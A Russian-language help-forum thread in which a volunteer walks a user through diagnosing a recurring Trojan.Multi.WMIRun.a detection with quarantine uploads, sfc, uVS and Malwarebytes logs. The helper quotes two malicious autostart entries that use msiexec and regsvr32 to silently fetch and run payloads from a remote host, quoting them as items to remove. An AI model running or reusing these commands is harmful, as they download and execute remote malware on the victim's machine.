Вирус Trojan.Multi.WMIRun.a

[Михаил Ключкин]

Доброго дня!

Периодично KES выводит сообщение о том что найден вирус в системной памяти Trojan.Multi.WMIRun.a 

17.08.2017 15:32:14 Обнаружено троянская программа Trojan.Multi.WMIRun.a System Memory Высокая

Предлагает лечить, после лечения перезагружает компьютер, показывает что угроза уничтожена и все.

И так в день может по несколько раз.

dr web cureit не находит ничего. Полная проверка касперского тоже

Где может лежать злополучный файл? или в чем может быть проблема?

CollectionLog-2017.08.17-16.18.zip

Изменено 17 августа, 2017 пользователем Михаил Ключкин

[regist]

1)  - Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.
 

2) "Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

O4 - MSConfig\startupreg: [start1] C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q (HKLM) (2017/08/10)
O4 - MSConfig\startupreg: [start] C:\Windows\system32\regsvr32.exe /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll (HKLM) (2017/08/10)

 

3) Этот файл как понимаю знаком?

D:\lombard82\ScriptForFilial.bat

4)

1. Вставьте диск, с которого устанавливали Windows (либо другой но с той же локализацией и тем же сервис паком (SP) что установлен у вас.
2. • Если у вас windows Vista или windows 7 откройте меню "Пуск" ("Start") и в строке поиска введите "cmd". На результатах поиска нажмите правой клавишей мыши и выберите пункт "Запуск от имени администратора".
   • Если у вас windows XP откройте меню Пуск (Start) -> Выполнить (Run)
     

  [*]Введите sfc /scannow и нажмите Энтер. [*]Система восстановит недостающие или изменённые системные файлы, для этого может потребоваться перезагрузка. [*]После того как закончится проверка в командной строке введите команду:

findstr /c:"[SR]" %windir%\Logs\CBS\CBS.log>%SYSTEMDRIVE%\sfcdetails.txt

[*]После выполнения вышеописанных операций в корне системного диска (тот диск,на котором установлена операционная система-как правило диск С) найдите файл sfcdetails.txt, прикрепите его к следующему сообщению.

 

5)

1. Скачайте Universal Virus Sniffer (uVS)
2. Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
3. Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.
   
   !!!Внимание.
   Если у вас установлены архиваторы
   WinRAR
   или
   7-Zip
   , то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.

4. Дождитесь окончания работы программы и прикрепите лог к посту в теме.
   
   !!! Обратите внимание
   , что утилиты необходимо запускать от имени Администратора. По умолчанию в
   Windows XP
   так и есть. В
   Windows Vista
   и
   Windows 7
   администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать
   Запуск от имени Администратора
   , при необходимости укажите пароль администратора и нажмите
   "Да"
   .

5. Подробнее читайте в руководстве Как подготовить лог UVS.

 

[Михаил Ключкин]

1)  - Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.

 

 

 

http://virusinfo.info/virusdetector/report.php?md5=112A1FE8447FC8E5B58C896F7DA7F527

 

 

 

2) "Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

O4 - MSConfig\startupreg: [start1] C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q (HKLM) (2017/08/10)

O4 - MSConfig\startupreg: [start] C:\Windows\system32\regsvr32.exe /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll (HKLM) (2017/08/10)

 

 

 

Данных строк не присутствовало

 

 

3) Этот файл как понимаю знаком?

D:\lombard82\ScriptForFilial.bat

 

 

Да, рабочий скрипт 1с

 

 

 

4)

• Вставьте диск, с которого устанавливали Windows (либо другой но с той же локализацией и тем же сервис паком (SP) что установлен у вас.
• • Если у вас windows Vista или windows 7 откройте меню "Пуск" ("Start") и в строке поиска введите "cmd". На результатах поиска нажмите правой клавишей мыши и выберите пункт "Запуск от имени администратора".
  • Если у вас windows XP откройте меню Пуск (Start) -> Выполнить (Run)

   

• Введите sfc /scannow и нажмите Энтер.
• Система восстановит недостающие или изменённые системные файлы, для этого может потребоваться перезагрузка.
• После того как закончится проверка в командной строке введите команду:

   

  findstr /c:"[sR]" %windir%\Logs\CBS\CBS.log>%SYSTEMDRIVE%\sfcdetails.txt
• После выполнения вышеописанных операций в корне системного диска (тот диск,на котором установлена операционная система-как правило диск С) найдите файл sfcdetails.txt, прикрепите его к следующему сообщению.

 

• Во вложении файл sfcdetails

 

 

5)

• Скачайте Universal Virus Sniffer (uVS)
• Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
• Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.

  !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.

• Дождитесь окончания работы программы и прикрепите лог к посту в теме.

  !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите"Да".

• Подробнее читайте в руководстве Как подготовить лог UVS.

 

 

 

Файл лога во вложении ELIS8_2017-08-21_11-52-27

sfcdetails.txt

ELIS8_2017-08-21_11-52-27.7z

[regist]

что с проблемой?

[Михаил Ключкин]

что с проблемой?

остается, раза 2 в день рандомно находится троян

[regist]

C:\USERS\LOCALROOT\DESKTOP\DIALUPASS2.EXE

как понимаю ваше?

 

Строчку из отчёта, что и где находит можете сюда скопировать?

 

+ Скачайте Malwarebytes' Anti-Malware. Установите.

На вкладке "Параметры" - "Личный кабинет" ("Settings" - "My Account") нажмите кнопку "Деактивировать ознакомительную Premium-версию".

На вкладке "Проверка" - "Полная проверка" нажмите кнопку "Начать проверку". Дождитесь окончания проверки.

Самостоятельно ничего не удаляйте!!!

Нажмите кнопку "Сохранить результат - Текстовый файл (*.txt)". Имя сохраняемому файлу дайте любое, например, "scan".

Отчёт прикрепите к сообщению.

Подробнее читайте в руководстве.

 

[Михаил Ключкин]

C:\USERS\LOCALROOT\DESKTOP\DIALUPASS2.EXE

как понимаю ваше?

 

Строчку из отчёта, что и где находит можете сюда скопировать?

 

Да, dualupass известно нам.

 

Из какого отчета?

[regist]

 

 

Из какого отчета?

отчёта антивируса о нахождение угрозы.